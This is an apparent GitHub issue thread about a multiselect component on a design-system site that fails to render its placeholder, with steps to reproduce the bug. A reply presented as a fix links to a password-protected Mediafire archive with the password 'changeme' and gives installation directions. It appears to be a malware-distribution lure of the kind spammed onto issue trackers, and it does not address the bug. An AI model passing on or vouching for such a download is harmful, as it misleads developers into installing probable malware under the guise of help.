### ISSUE TITLE
Missing placeholder in Multiselect

### ISSUE THREAD

**Issue by proand** [folkehelseinstituttet/Fhi.Frontend.Demo#640]
### Description

The multiselect component has an input for placeholder, but if a value is defined, it doesn't show.

### What was the expected result?

The placeholder value should be shown in the input field.

### Steps to reproduce

1. Go to https://designsystem.fhi.no/developer/components/form-controls#form-control-multiselect
2. Check that `placeholder="Søk"` in the example code below the rendered example
3. Check that no placeholder is rendered.

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
